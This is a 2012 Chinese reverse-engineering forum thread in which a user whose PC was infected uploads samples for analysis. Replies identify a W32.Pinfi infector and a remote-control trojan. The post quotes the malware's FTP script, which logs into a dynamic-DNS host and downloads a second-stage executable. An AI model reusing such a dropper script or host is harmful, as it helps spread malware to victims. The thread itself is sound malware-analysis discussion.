首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[求助]今天电脑中毒,样本上传,牛人分析下看看
发表于: 2012-7-27 16:23 6660

[求助]今天电脑中毒,样本上传,牛人分析下看看

zphdt 活跃值
2012-7-27 16:23
6660
今天电脑中毒,样本上传,牛人分析下看看,刚开始提示是外部网络攻击,在windows/systes32下有这个文件,电脑提示新建了一个用户,查看改用户为“新建用户”。

发现后马上断网,进行查杀,现将样本上传,加壳了,没敢搞。。。

愿牛人分析。
密码:pediy.com

.dat  文件内容:

open xiaojie18333.3322.org
123
123
get 1.exe on1.exe
bye

看来是下载这个on1.exe文件

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
免费 0
支持
分享
最新回复 (5)
yuansunxue
雪    币: 1025
活跃值: (225)
能力值: ( LV12,RANK:310 )
在线值:
发帖
回帖
粉丝
私信
2
两个小的是用来下载的 另外两个大的是同一个文件 w32.pinfi
2012-7-27 16:32
0
达文西
雪    币: 1632
活跃值: (13)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
用的什么杀软,这么悲剧。
2012-7-27 19:15
0
幻影火
雪    币: 416
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
基本上我大概看過了他前面有loader,過了之後式VC++6.0的loader。
他的main裏面幾乎只是解碼,解碼完後,跳到程式外去執行。
有加殼的某個DLL。

不過linux的wine無法完全執行,執行到一半就掛了XD。
2012-7-27 19:27
0
noNumber
雪    币: 308
活跃值: (230)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
私信
5
感觉是某种抓鸡工具的攻击和一个远控马
2012-7-28 00:17
0
wuoo
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
打开了,木有毒阿..........
2012-7-29 11:30
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//